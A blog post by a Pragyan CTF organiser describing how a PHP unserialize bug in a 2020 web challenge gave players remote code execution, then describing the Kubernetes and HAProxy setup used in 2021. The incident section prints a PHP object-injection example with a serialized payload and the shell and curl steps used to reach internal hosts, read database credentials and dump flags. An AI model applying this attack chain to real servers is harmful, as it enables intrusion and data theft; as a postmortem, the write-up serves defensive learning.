Pragyan CTF 2020--2022
image source: dailydot.com
A slight jump into the past, and we are back at the start of 2020, with those nice pre-Covid vibes, when we used to sit together coding day and night, with loads of discussion and idea-sharing of course, for the upcoming Pragyan'20. For those of you who don't know what Pragyan is: it is the techno-managerial festival of NIT Trichy, and I belong to the team that handles all the software-related things. CTF enthusiasts might recall Pragyan because of the wonderful experiences they had with us during Pragyan CTF'20.
It's been almost 4 years, and we are still striving to get better with every such mistake. Of course, that's what we do: we are developers, we develop things, make them better, and learn from mistakes. AND yes, I was part of the Pragyan CTF'20 developer team as well, just a member of a group of four sophomores who had only just entered the realm of CTFs, trying to host an event this large for the first time. These four kids weren't aware of the upcoming roller coaster ride.
Pragyan CTF is a 36-hour-long jeopardy-style capture-the-flag event, where around 1000 individuals participate from all around the world. I am not exaggerating, that is the number, and it was a surprise for us as well back then. Well, a scary surprise, I must say.
Each of the four of us was responsible for one category, namely Forensics (that one was handled by me), Binary and Reversing, Cryptography, and finally Web. Starting in January, we began creating questions and working on our infra alongside them. That year we decided to go with Mellivora (built with PHP) as our CTF engine because of its easily scalable structure.
A week before the event went live, we started the final stress-testing of the questions among our groupmates. Like any other CTF, we hosted rooms for discussion over Discord. Finally, on 23rd Feb 2020, at 8:00 PM sharp, the event went live, and people started solving challenges one by one.
That was a moment of relief, because this was what we had been working towards for the past 2 months. The discussions over Discord were also going great; people liked the challenges we made. We had our "Sorta Happy Moment" there. But how could everything possibly be perfect on the very first go? We were very well aware of our extremely incredible luck.
Sometime around 10:00 PM, there was a discussion over Discord about the platform going down all of a sudden. Not even a second of relaxation, and the platform actually went down, the reason still unknown at that moment.
And it was at this moment we realised, we.... Never mind.
The server had been turned off by one of our groupmates because of some suspicious behaviour he noticed in the logs. There was a discussion over CTFtime and Discord about it, caused by a mistake we had made in one of the challenges. We started working, trying to keep each other's morale up. Obviously, nothing worse could have happened. And.....
At the very same moment, we lost the mod permissions on the Discord server as well. The night couldn't have been better, to be honest.
Sarcasm!!! Image source: https://giphy.com/gifs/bazinga-YWZPFFCblEqsw
Things kept getting worse. The internet is definitely a boon for many; we became a source of entertainment when participants started posting memes over CTFtime instead of solving challenges.
image source: one of our amazing participant teams
Scratching our heads, we were confused about what could possibly have happened. The discussions suggested that one of our challenges allowed RCE on our server, even though we thought we had prevented it in every possible way. It took us a while to figure out the actual issue and why it happened. Apparently, we had forgotten to test one of the Web challenges.
The challenge was fixed and the server went up again, and we took a deep breath to relax. Nope! Not that easy.
We had fixed the challenge, but we forgot that we hadn't fixed the damage it had already done. It was thanks to our lovely participants that we got to witness this over CTFtime.
image credits: again the same set of participants
Yes, all the flags had been leaked by one team. But we had to look past the unprofessional behaviour and focus on how to fix the whole thing. And yet again we had to take our server down immediately (it was 3:23 AM). Our morale went down completely. But thanks to some good participants we had, who kept motivating us, especially the super friendly people from Team-BI0S.
The whole reason behind this mess was:
One of our Web challenges, named Brutus, had a small issue with PHP unserialize that gave RCE privileges to every user. We had forgotten to implement a time-out check on the challenge, and in no time users figured out the bug and comfortably used it to create a reverse shell to the server.
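To illustrate the class of bug (a minimal hypothetical sketch, not the actual Brutus source): if user input flows straight into `unserialize()`, an attacker can conjure up an object of any loaded class and abuse its magic methods.

```php
<?php
// Hypothetical sketch of a PHP object-injection bug, NOT the actual
// Brutus code. A class with a dangerous __destruct is all it takes:
class Logger
{
    public $cmd = 'echo ok';

    public function __destruct()
    {
        system($this->cmd); // runs when the object is destroyed
    }
}

// Attacker-controlled input passed straight into unserialize():
unserialize($_GET['data']);
// e.g. ?data=O:6:"Logger":1:{s:3:"cmd";s:2:"id";}
// swap "id" for a reverse-shell one-liner and you have RCE
```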
```
www-data@5841bda2da57:/code$ cat /etc/hosts
127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback
fe00::0     ip6-localnet
ff00::0     ip6-mcastprefix
ff02::1     ip6-allnodes
ff02::2     ip6-allrouters
172.26.0.4  5841bda2da57
```
Users used this to check the /etc/hosts file, which gave the IP address of the internal server, i.e. 172.26.0.4. After that, it was pretty easy to guess that the host server could have the IP address 172.26.0.1.
```
www-data@5841bda2da57:/code$ curl 172.26.0.1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="mellivora/">mellivora/</a></td><td align="right">2020-02-21 22:08</td><td align="right"> - </td><td> </td></tr>
   <tr><th colspan="5"><hr></th></tr>
  </table>
<address>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</address>
</body></html>
```
Now, as I mentioned, we were using the Mellivora CTF engine to host the platform, and it was available at 172.26.0.1/mellivora.
```
www-data@5841bda2da57:/code$ curl 172.26.0.1/mellivora/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /mellivora</title>
 </head>
 <body>
<h1>Index of /mellivora</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
   <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="Dockerfile">Dockerfile</a></td><td align="right">2020-02-17 12:37</td><td align="right">720</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="LICENSE">LICENSE</a></td><td align="right">2020-02-17 12:37</td><td align="right">34K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="README.md">README.md</a></td><td align="right">2020-02-17 12:37</td><td align="right">2.8K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="benchmarks.md">benchmarks.md</a></td><td align="right">2020-02-17 12:37</td><td align="right">6.4K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="codeception.yml">codeception.yml</a></td><td align="right">2020-02-17 12:37</td><td align="right">340</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="composer.json">composer.json</a></td><td align="right">2020-02-17 12:37</td><td align="right">696</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="composer.lock">composer.lock</a></td><td align="right">2020-02-17 12:37</td><td align="right">106K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="docker-compose.dev.yml">docker-compose.dev.yml</a></td><td align="right">2020-02-22 06:35</td><td align="right">1.1K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="docker-compose.test.yml">docker-compose.test.yml</a></td><td align="right">2020-02-17 12:37</td><td align="right">1.2K</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="htdocs/">htdocs/</a></td><td align="right">2020-02-17 12:37</td><td align="right"> - </td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="include/">include/</a></td><td align="right">2020-02-20 13:35</td><td align="right"> - </td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="install/">install/</a></td><td align="right">2020-02-17 12:37</td><td align="right"> - </td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="rules.txt">rules.txt</a></td><td align="right">2020-02-21 22:08</td><td align="right">826</td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="tests/">tests/</a></td><td align="right">2020-02-17 12:37</td><td align="right"> - </td><td> </td></tr>
   <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="writable/">writable/</a></td><td align="right">2020-02-17 12:37</td><td align="right"> - </td><td> </td></tr>
   <tr><th colspan="5"><hr></th></tr>
  </table>
<address>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</address>
</body></html>
```
If you look at the GitHub repo for Mellivora, you will find a docker-compose.dev.yml file, and that file was now easily accessible.
```
www-data@5841bda2da57:/code$ curl 172.26.0.1/mellivora/docker-compose.dev.yml
version: '3'
services:
  mellivora:
    image: mellivora
    ports:
      - 4000:80
      - 4002:443
    build:
      context: .
      dockerfile: Dockerfile
    environment:
      MELLIVORA_CONFIG_DB_ENGINE: mysql
      MELLIVORA_CONFIG_DB_HOST: db
      MELLIVORA_CONFIG_DB_PORT: 3306
      MELLIVORA_CONFIG_DB_NAME: [redacted]
      MELLIVORA_CONFIG_DB_USER: [redacted]
      MELLIVORA_CONFIG_DB_PASSWORD: [redacted]
    volumes:
      - .:/var/www/mellivora
      - composerdependencies:/var/www/mellivora/include/thirdparty/composer
    links:
      - db
  db:
    image: mysql:5.6
    ports:
      - 13306:3306
    environment:
      MYSQL_DATABASE: [redacted]
      MYSQL_USER: [redacted]
      MYSQL_PASSWORD: [redacted]
      MYSQL_ROOT_PASSWORD: [redacted]
    volumes:
      - dbdata:/var/lib/mysql
      - ./install/sql:/docker-entrypoint-initdb.d
  adminer:
    image: adminer
    restart: always
    ports:
      - 15246:8080
volumes:
  composerdependencies:
  dbdata:
```
This file gave users the password to our database container. Using these details, some teams were able to get access to all the flags, and one of them apparently leaked them over CTFtime.
```php
$con = new mysqli('172.26.0.1', '[redacted]', '[redacted]', '[redacted]');
$res = $con->query('show databases')->fetch_all();
var_dump($res);
```
Basically, the host server and the challenges should have been separated from the very beginning, which would have prevented this huge mess.
We worked overnight, changed all the flags, resolved the bug in the challenge, and were able to bring the CTF back up successfully the next day. We had to deal with a lot of criticism, but at the end of the day, we were able to finish the event happily.
Fast forward to 2021, and it was time for a totally new Pragyan edition. Now we were aware of the mistakes we had made the previous year, and we planned to improve on them this time.
The idea was to host a scalable CTF platform, so we chose HAProxy + Kubernetes for the challenges.
The first step was to set up a Kubernetes (K8s) cluster on Google Cloud.
$ echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list
# Install depssudo\
$ apt-get install apt-transport-https ca-certificates gnupg
# Import google cloud public key\
$ curl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key --keyring /usr/share/keyrings/cloud.google.gpg add -
# Update apt package index, install cloud sdksudo\
$ apt-get update && sudo apt-get install google-cloud-sdk
The next step was to create a cluster, based on the number of nodes we needed and the regions we wanted to deploy them in. These two commands list the available machine types and zones:
```
$ gcloud compute machine-types list
$ gcloud compute zones list
```
After this, we could simply run the following command to create a cluster:
```
$ gcloud container clusters create <cluster-name> \
    --zone <compute-zone> \
    --machine-type <machine-type you chose> \
    --num-nodes <number of nodes in the cluster> \
    --tags challenges
```
Note the --tags option: it assigns the given tag to each VM instance in the cluster.
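The tag is presumably what lets you expose the challenge ports to the world, since on Google Cloud firewall rules can target instances by tag. A hedged example (the rule name is made up, and the port range assumes the default Kubernetes NodePort range):

```
# Open the Kubernetes NodePort range on every VM tagged "challenges"
$ gcloud compute firewall-rules create allow-challenge-ports \
    --allow tcp:30000-32767 \
    --target-tags challenges
```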
Now, the final step was to use kubectl to deploy the challenges on the cluster. For this, we had to build Docker images for all the challenges locally and push them to a registry. Once the images were pushed, all that remained was to write a YAML file to deploy them, something similar to this:
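(The original embed is gone, so here is a minimal sketch of what such a manifest could look like, assuming challenges are exposed as NodePort services. The challenge name `brutus`, image path, replica count, and ports are placeholders, not our actual manifests.)

```yaml
# Hypothetical challenge deployment; names, image, and ports are placeholders.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: brutus
spec:
  replicas: 2
  selector:
    matchLabels:
      app: brutus
  template:
    metadata:
      labels:
        app: brutus
    spec:
      containers:
        - name: brutus
          image: <registry>/brutus:latest
          ports:
            - containerPort: 80
---
# Expose the pods on a fixed port on every node so the load balancer can reach them
apiVersion: v1
kind: Service
metadata:
  name: brutus
spec:
  type: NodePort
  selector:
    app: brutus
  ports:
    - port: 80
      nodePort: 30080
```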
This was followed by `kubectl apply -f deployment.yml`.
Setting up an HAProxy load balancer in front of your cluster
To create a load balancer, we just provisioned a separate VM and installed HAProxy on it. All that was left to do was to write the HAProxy config file, in a way similar to this:
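(Again, the original embed did not survive; below is a minimal sketch assuming the challenges are exposed as NodePorts on the cluster VMs. The node IPs, ports, and backend names are placeholders, not our actual config.)

```
# haproxy.cfg (sketch; node IPs and ports are placeholders)
defaults
    mode tcp
    timeout connect 5s
    timeout client  50s
    timeout server  50s

# One frontend/backend pair per challenge port
frontend brutus_in
    bind *:30080
    default_backend brutus_nodes

backend brutus_nodes
    balance roundrobin
    server node1 10.128.0.2:30080 check
    server node2 10.128.0.3:30080 check
```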
And that's it. The events went live and ended successfully, with no issues till the end.
You can check the questions out on GitHub:

- [Bhavesh0327/pctf_20](https://github.com/Bhavesh0327/pctf_20)
- [Bhavesh0327/PCTF21](https://github.com/Bhavesh0327/PCTF21)
Well, that was it. Do not miss out on the upcoming editions of Pragyan CTF!